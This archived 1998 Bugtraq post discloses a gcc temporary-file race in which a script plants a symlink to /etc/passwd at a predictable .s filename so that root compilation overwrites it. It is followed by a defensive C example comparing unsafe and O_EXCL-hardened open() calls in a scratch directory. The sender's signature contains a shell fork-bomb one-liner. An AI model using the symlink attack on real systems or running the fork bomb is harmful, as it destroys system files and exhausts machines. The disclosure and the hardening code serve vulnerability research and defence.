Bugtraq mailing list archives
GCC 2.7.? /tmp files
From: lcamtuf () POLBOX COM (Michał Zalewski)
Date: Thu, 15 Jan 1998 22:46:06 +0100
During compilation, gcc uses the following temporary files:

  /tmp/ccXXXXXX.i
  /tmp/ccXXXXXX.s
  /tmp/ccXXXXXX.o

where XXXXXX means a 'unique' random number. Unique, but not quite. Only the first file (.i) is created properly, after detailed checks. But the next one (.s) is created within a noticeable time interval using _exactly the same_ number and without performing any checks (!). Finally, the last file (.o) is created again in the same way, but '1' is appended to the sequence number.

Now, we may leave a script which periodically checks /tmp looking for cc*.i files. If any has been found, the script immediately creates a link to /etc/passwd (or another vital file) using the sequence number stripped from the .i file. Because no checks are performed by gcc, if our script was fast enough, the target file may be overwritten when gcc has been launched by root! That's especially possible when large sources (more than 20-50 kB?) are compiled.

I attached a simple and slow exploit. It works, but should become even more effective when you rewrite it in C... I've tested it under gcc 2.7.3.f.1

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP = [lcamtuf () boss staszic waw pl]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] = ---------=

[Attachment: gcc-exploit]
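As an added example, not part of Zalewski's post or of gcc's own source, here are the two open() patterns behind the report: deriving the .s name from the .i name and opening it without O_EXCL (the behaviour the post describes), beside the O_EXCL|O_NOFOLLOW variant that refuses a pre-planted link, with a self-contained check run in a private scratch directory. The function names, the scratch directory under /tmp and the constructed victim file are assumptions made for this example.

```c
#define _GNU_SOURCE  /* for O_NOFOLLOW and mkdtemp() */
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
/* Build "<base>.s" (or ".o") from "<base>.i" the way the post says gcc did:
 * same sequence number, new extension, no fresh uniqueness check. */
static void derive_name(const char *ifile, const char *ext, char *out, size_t n) {
    size_t len = strlen(ifile);
    if (len > 2 && strcmp(ifile + len - 2, ".i") == 0) len -= 2;
    snprintf(out, n, "%.*s%s", (int)len, ifile, ext);
}
/* Vulnerable pattern: O_CREAT without O_EXCL follows a symlink that was planted
 * at the predictable name and truncates whatever it points to. */
int unsafe_open_derived(const char *ifile, const char *ext) {
    char path[PATH_MAX];
    derive_name(ifile, ext, path, sizeof path);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}
/* Hardened pattern: O_EXCL makes the kernel atomically refuse any pre-existing
 * path, symlink included; EEXIST must be answered by choosing a new name. */
int safe_open_derived(const char *ifile, const char *ext) {
    char path[PATH_MAX];
    derive_name(ifile, ext, path, sizeof path);
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}
/* Regression check in a private mkdtemp() directory: a constructed victim file and
 * a symlink pre-planted at the derived ".s" name stand in for the race. Returns 0
 * on setup failure; else bit 0 = safe open refused (EEXIST), bit 1 = victim truncated. */
int race_check(void) {
    char dir[] = "/tmp/cctestXXXXXX", victim[PATH_MAX], ifile[PATH_MAX], sfile[PATH_MAX];
    struct stat st; int result = 0, fd;
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(ifile, sizeof ifile, "%s/ccAbC123.i", dir);  /* the ".i" gcc created */
    derive_name(ifile, ".s", sfile, sizeof sfile);
    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "constructed victim data\n", 24) != 24) return 0; close(fd);
    if (symlink(victim, sfile) != 0) return 0;              /* pre-planted link */
    fd = safe_open_derived(ifile, ".s");
    if (fd < 0 && errno == EEXIST) result |= 1; else if (fd >= 0) close(fd);
    if ((fd = unsafe_open_derived(ifile, ".s")) >= 0) close(fd);
    if (stat(victim, &st) == 0 && st.st_size == 0) result |= 2;
    unlink(sfile); unlink(victim); rmdir(dir);
    return result;
}
```

race_check() returning 3 means the O_EXCL open was refused while the plain O_CREAT open emptied the victim, which is exactly the difference between the checked .i creation and the unchecked .s/.o creation the post describes.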